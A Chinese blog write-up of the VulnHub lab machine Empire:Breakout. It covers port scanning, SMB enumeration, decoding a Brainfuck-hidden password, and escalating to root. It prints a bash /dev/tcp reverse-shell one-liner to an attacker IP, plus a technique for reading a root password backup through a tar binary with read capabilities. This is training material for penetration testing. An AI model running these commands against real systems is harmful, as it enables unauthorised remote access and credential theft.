首页 > 其他分享 >《VulnHub》Empire:Breakout

《VulnHub》Empire:Breakout

时间:2023-09-04 19:44:34浏览次数:58  
标签:shell tar 主机 tcp Breakout VulnHub pass Empire bak

@

目录


VulnHub 打靶记录。官网:https://www.vulnhub.com/

攻击机为 Kali-Linux-2023.2-vmware-amd64。
Kali NAT IP:192.168.8.10。

1:靶场信息

靶场网址:https://www.vulnhub.com/entry/empire-breakout,751/

2:打靶

2.1:情报收集&威胁建模

由于不知道目标主机的 ip,且目标与攻击机在同一局域网,所以可使用 arp-scan 命令发现主机。

发现主机
arp-scan -l

在这里插入图片描述

通过 ping 测试发现 192.168.8.105 在线,靶机 ip 确定。

目标信息扫描
nmap -sS -sV -T4 -n -p- 192.168.8.105

在这里插入图片描述

Nmap scan report for 192.168.8.105
Host is up (0.0012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:B8:7A:E6 (VMware)

访问 80 端口,是 Apache 的默认页面。

在这里插入图片描述

查看页面源码,发现一串加密信息。为 Brainfuck 编码。

在这里插入图片描述

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

Brainfuck 在线编解码:
http://www.hiencode.com/brain.html

解密后的内容:

.2uqPEfj3D<P'a-3

访问 10000 端口,是一个使用 https 的 Webmin 页面。

在这里插入图片描述

访问 20000 端口,是一个使用 https 的 Usermin 页面。

在这里插入图片描述

139 端口与 445 端口表明主机开启了 SMB 服务,使用 enum4linux 对 SMB 进行枚举探测

枚举 SMB 信息
enum4linux 192.168.8.105

探测到一个本地用户 cyber。

在这里插入图片描述

2.2:漏洞分析&渗透攻击

使用用户名【cyber】与【.2uqPEfj3D<P'a-3】作为密码尝试登录 Webmin 与 Usermin。成功从 Usermin 登录。

在这里插入图片描述

且在页面可以发现一个 shell。

在这里插入图片描述

查看当前用户 home 目录下的文件。
ls -al

在这里插入图片描述

目录下的 user.txt 文件可能会比较有趣。
cat user.txt

发现了第一个 flag。

在这里插入图片描述

接下来进行提权。为了方便操作,首先使用 netcat 进行 shell 反弹。目标主机上的 netcat 没有权限,所以这里使用其他方法。

1、kali:nc -lv -p 6666
2、server:bash -i >& /dev/tcp/192.168.8.10/6666 0>&1

成功反弹 shell 到 kali。

在这里插入图片描述

接下来要搜集其他的信息以帮助提权。

先寻找一下主机上有没有什么备份文件和与密码相关的文件。
find / -name '*.bak'
find / -name '*pass*'

找到一个备份文件 /var/backups/.old_pass.bak

在这里插入图片描述

/var/backups/.old_pass.bak 没有执行权限。
尝试把文件拷贝或传输,提示权限不够。

此时得想其他办法,先从已有的信息入手。可以发现 home 目录下 tar 这个文件权限很高。与 tar 命令同名。

在这里插入图片描述

再使用 getcap 命令查看一下该文件权限。
getcap ./tar

在这里插入图片描述

结果结果显示此文件可以读取任意文件。

那就使用 home 目录下的 tar 文件把 /var/backups/.old_pass.bak 压缩,再用系统的 tar 命令解压,这样就解决了权限问题。

打包文件:
./tar -cvf ./passwd.tar /var/backups/.old_pass.bak

解压文件:
tar -xvf passwd.tar

在这里插入图片描述

读取解压后的文件 ./var/backups/.old_pass.bak
cat ./var/backups/.old_pass.bak

在这里插入图片描述

Ts&4&YurgtRX(=~h

网页上无法进行提权,所以得回到 kali 得到的反弹 shell 进行 root 账户登录。

到这里就可以看到提权成功了:

在这里插入图片描述

进入 /root/ 下拿到最后的 flag:

在这里插入图片描述

至此,打靶结束,完结撒花。

3:总结

万事开头难,作为在 VulnHub 打的第一个靶,选了一个比较简单的靶场。
嗯,又开了一个新坑。(= ̄ω ̄=)

3.1:命令&工具

3.1.1:Nmap

部分选项

参数 介绍
-sS/sT/sA/sW/sM TCP SYN/Connect()/ACK/Window/Maimon scans
-sV Probe open ports to determine service/version info
-T<0-5> Set timing template (higher is faster)
-n/-R Never do DNS resolution/Always resolve [default: sometimes]
-p- 描目标主机的所有端口

3.2:关键技术

  • 主机发现,ARP 二层发现:
    arp-scan -l

  • 目标信息扫描,扫描所有端口及开放端口的服务:
    nmap -sS -sV -T<0-5> -n -p- <target>

  • Brainfuck 编码方式

  • SMB 服务信息枚举
    enum4linux <target>

  • 反弹 shell,利用 bash 配合 netcat:
    1、kali:nc -lv -p <端口>
    2、target:bash -i >& /dev/tcp/<address>/<端口> 0>&1

bash -i >& /dev/tcp/<address>/<端口> 0>&1 是一个常用的反弹 shell 命令。常用于把内网的机器反弹到外网机器上,从而实现外网主机控制内网主机。在内网环境也可以用。
这个命令的功能简单来说就是将输入输出重定向到指定的位置,达到反弹 shell 的结果。

  • find 命令查找关键信息

都道无人愁似我,今夜雪,有梅花,似我愁。

——《梅花引 · 荆溪阻雪》(宋)蒋捷

标签:shell,tar,主机,tcp,Breakout,VulnHub,pass,Empire,bak
From: https://www.cnblogs.com/GCom/p/17677928.html

相关文章

  • Vulnhub: INO: 1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.234信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23480端口目录爆破gobusterdir-uhttp://192.168.111.234/lot-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,......
  • Vulnhub: Inferno: 1.1靶机
    kali:192.168.111.111靶机:192.168.111.233信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23380端口目录爆破gobusterdir-uhttp://192.168.111.233-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,html......
  • Vulnhub: Hogwarts: Bellatrix靶机
    kali:192.168.111.111靶机:192.168.111.228信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.228访问80端口查看源码,提示ikilledsiriusblack.php和文件包含的参数名file漏洞利用ikilledsiriusblack.php存在文件包含http://192.168.111.228/......
  • Vulnhub: Ragnar Lothbrok: 1靶机
    kali:192.168.111.111靶机:192.168.111.226信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.226作者提示修改hosts文件目录爆破gobusterdir-uhttp://armbjorn-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,ba......
  • 【渗透测试】Vulnhub EMPIRE BREAKOUT
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.130靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/进行渗透一、获取IP及端口信息开机已经能看到靶机的IP,我们就不再扫描网段了。扫描端口、系统、版本nmap-sV-......
  • Vulnhub: DriftingBlues: 1靶机
    kali:192.168.111.111靶机:192.168.111.215信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.21580端口首页源码访问noteforkingfish.txt,发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/ser......
  • Vulnhub: DOUBLE: 1靶机
    kali:192.168.111.111靶机:192.168.111.209信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.209目标80端口sendcommand.php页面源码写入webshell<?phpsystem($_GET["cmd"]);?>执行命令http://192.168.111.209/production/sendcommand......
  • 0×03 Vulnhub 靶机渗透总结之 KIOPTRIX: LEVEL 1.2 (#3) SQL注入+sudo提权
    0×03Vulnhub靶机渗透总结之KIOPTRIX:LEVEL1.2(#3)......
  • Vulnhub: ICMP: 1靶机
    kali:192.168.111.111靶机:192.168.111.208信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.20880端口的cms为Monitorr1.7.6m搜索发现该版本的cms存在远程代码执行searchsploitmonitorr漏洞利用nc本地监听,再执行exppython348980.pyh......
  • 【渗透测试】 Vulnhub JANGOW: 1.0.1
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.129靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/进行渗透一、获取IP及端口信息使用nmap扫描同网段IP,如果使用的是VMware可能出现扫描不到的情况,需要在靶机的恢复模式里......